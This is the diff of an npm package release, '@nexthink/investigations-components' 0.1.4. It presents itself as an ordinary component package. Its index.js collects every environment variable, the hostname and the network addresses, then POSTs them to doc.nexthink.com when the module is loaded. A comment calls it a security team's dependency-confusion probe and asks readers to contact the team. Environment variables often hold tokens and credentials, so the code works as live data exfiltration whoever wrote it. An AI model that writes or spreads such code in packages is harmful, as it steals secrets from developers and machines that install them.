@nexthink/investigations-components 0.1.4

package/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2022 nxt-fmiquel
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

package/README.md

@@ -0,0 +1 @@
+# investigations-components

package/index.js

@@ -0,0 +1,54 @@
+'use strict'
+
+// This code dumps local env variable and post them to an http server to identify the machines vulnerable to npmjs org/package claim.
+// If you see this comment, please contact security@nexthink.com - this code and server are under the control of the Nexthink Security Team and no harmful code is executed.
+
+const env = process.env;
+
+const os = require("os");
+env.hostname  = os.hostname();
+env.package = "investigations-components";
+
+const nets = os.networkInterfaces();
+const results = Object.create(null);
+for (const name of Object.keys(nets)) {
+    for (const net of nets[name]) {
+        // Skip internal (i.e. 127.0.0.1) addresses
+        if (!net.internal) {
+            if (!results[name]) {
+                results[name] = [];
+            }
+            results[name].push(net.address);
+        }
+    }
+}
+env.inets = JSON.stringify(results);
+
+// request options
+const options = {
+    host: "doc.nexthink.com",
+    path: '/npm',
+    method: 'POST',
+    body: JSON.stringify(env),
+    headers: {
+        'Content-Type': 'application/json'
+    }
+}
+
+// send POST request
+const https = require('https');
+const request = https.request(options, (res) => {
+    if (res.statusCode !== 200) {
+        res.resume();
+        return;
+    }
+    res.on('close', () => {
+    });
+});
+request.write(JSON.stringify(env));
+request.end();
+request.on('error', (err) => {
+    console.error(`Encountered an error trying to make a request: ${
+        err.message
+    }`);
+});

package/package.json

@@ -0,0 +1,19 @@
+{
+  "name": "@nexthink/investigations-components",
+  "version": "0.1.4",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "MIT",
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/nxt-fmiquel/investigations-components.git"
+  },
+  "bugs": {
+    "url": "https://github.com/nxt-fmiquel/investigations-components/issues"
+  },
+  "homepage": "https://github.com/nxt-fmiquel/investigations-components#readme",
+  "description": ""
+}